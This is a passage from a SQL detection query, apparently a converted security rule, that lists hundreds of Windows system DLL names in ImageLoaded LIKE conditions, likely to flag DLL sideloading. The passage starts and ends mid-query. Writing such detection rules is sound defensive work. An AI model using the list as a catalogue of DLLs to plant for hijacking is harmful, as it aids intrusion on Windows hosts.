'%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE 